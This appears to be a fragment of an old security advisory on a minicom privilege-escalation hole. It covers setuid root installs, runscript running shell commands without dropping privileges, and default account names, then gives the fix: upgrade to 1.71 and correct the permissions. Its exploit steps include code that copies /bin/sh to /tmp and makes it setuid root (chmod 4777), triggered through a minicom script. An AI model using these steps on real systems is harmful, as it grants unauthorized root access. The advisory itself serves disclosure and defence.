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Minicom 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Minicom users defined in its minicom.users file can gain ro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Some distributions install minicom setuid roo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ess callout devices (/dev/cua0, /dev/ttyS0, /dev/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 also allows users to create script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utomate logins, and other tasks. This script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unscript(1). runscript(1) allows arbitrary shell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 forks and exec runscript(1) without calling setreui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op priviledges. Therefore it fallows the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commands with the privilege of mini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icate matters even more some distribution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.users file with default user name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ckware this are: gonzo, satan, snake. If you cre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names on you system you are oppening you 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urity breach. If you have accounts under those nam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disable them until security is restored. I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you to change their username to one of those o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with one of those names DO NO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it: Create a program that sets its real and effective uid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ecutes a shell command such as copying a shell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id root. This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etreuid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ystem("/bin/cp /bin/sh /tmp/my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ystem("/bin/chmod 4777 /tmp/my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minicom script that will execute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! /tmp/gime' &gt; /tmp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minicom and type Control-A then G. Select C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for our minicom script (/tmp/foo). Hit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script. Exit minicom and you should find a setui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s /tmp/my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pgrade to minicom 1.71. Futhermore minicom should not be suid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 should be of the same group as the dialout devic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y, dialout, modem, or uucp), and setguid. On a side not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s have the correct premission in the /dev/cu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on their equivalent /dev/ttyS devices. This is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ian 0.93. To fix chown root.dialout /dev/ttyS*; chmod o-rw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ttyS*. Make sure that this does brake your other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 One / aleph1@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ndergroun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ID 1024/948FD6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print B6 C3 BD 8A 7A 79 03 55  CC 24 F4 01 2B BD 90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